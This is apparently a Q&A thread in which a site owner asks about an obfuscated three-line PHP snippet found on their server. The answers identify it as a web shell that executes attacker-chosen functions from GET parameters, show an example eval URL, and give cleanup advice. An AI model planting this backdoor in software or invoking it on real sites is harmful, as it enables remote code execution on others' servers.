# Is that some kind of PHP backdoor

Tags: php

Hi I found this code in my website files is this some kind of backdoor?can someone explain this code line by line

```
 <? $_="{";
 $_=($_^"<").($_^">").($_^"/");?>
 <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
```

Comment: no it's not, it's just somebody was trying to create a emoji face from that string and failed to make it :P

Comment: @BlackXero your reply ist just plain wrong. This is indeed malicious code.

Answer (score 10, accepted):

Yes, this is malicious code.

Before spending any time looking at it, you should **immediately take the site offline and replace it with a known-good copy**, e.g. a backup or the official release. You should also **make sure everything on your server is up to date** and **change your admin passwords**. The fact that this code is there means **your code was already compromised**.

To confirm I'm not being over-dramatic, here's how the code works:

- The first two lines generate a string containing the letters `'GET'` by using [bitwise XOR operations](https://www.php.net/manual/en/language.operators.bitwise.php).
- The third line then adds an `'_'` at the beginning, and executes `$_GET["_"]($_GET["__"]);`, echoing the result with `<?=`
- This allows the attacker to access the page with a query string where `_` is a function name and `__` is its argument; PHP will run the function and display the result.
- This in turn allows them to run any code they like, because they can just go to `/yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();

But to reiterate, **the above is only to satisfy curiosity**; this is a case where you should "shoot first, ask questions later". As soon as you've identified the code shouldn't be there, **assume you've been compromised**.

Comment: Was just going to write the same. Nice and easy explanation with the example provided.

Comment: @IMSop can you please show me this is a demo or anywhere, where we can run PHP

Comment: @BlackXero Here's a demo using `_=strtoupper&__=hello-world`: https://3v4l.org/qp8a0 I'm not convinced it adds much to the answer, though. The main point is **this code is malicious and should be purged thoroughly**.